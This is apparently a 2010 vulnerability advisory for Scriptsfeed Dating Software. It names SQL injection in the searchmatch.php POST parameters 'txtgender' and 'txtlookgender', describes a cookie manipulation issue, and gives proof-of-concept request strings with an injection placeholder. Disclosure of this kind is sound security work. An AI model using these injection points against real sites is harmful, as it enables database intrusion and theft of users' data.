============================================================================== [~] Scripts Feed Dating Software (Cookie Manip/SQLi) Multiple Remote Vulnerabilities ============================================================================== [+] My home [ http://hack-tech.com ] [+] Date Submitted: [ February 27 2010 ] [+] Founder: [ Crux ] [+] Vendor: [ Scriptsfeed ] [+] Version: [ ALL ] [+] Download: [ http://www.scriptsfeed.com/dating-software.htmll ] ~ SQLi ------------------------------------------------------------------------ [ EXPLOIT ] - This vulnerability affects searchmatch.php -The POST variables 'txtlookgender' and 'txtgender' are vulnerable. [ POC ] 1. txtgender=${injectHere}&txtlookgender=F&txtlookagestart=16&txtlookageend=16&with_photo=on 2. txtgender=M&txtlookgender=${injectHere}&txtlookagestart=16&txtlookageend=16&with_photo=on ~ Cookie Manipulation ------------------------------------------------------------------------ [ EXPLOIT ] - This script is vulnerable to Cookie manipulation attacks. - This vulnerability affects searchmatch.php By injecting a custom HTTP header or by injecting a META tag, it is possible to alter the cookies stored in the browser. [ POC ] txtgender=&txtlookgender=M&txtlookagestart=16&txtlookageend=16&with_photo=on ============================================================================== ________________________________ Your E-mail and More On-the-Go. Get Windows Live Hotmail Free. Sign up now.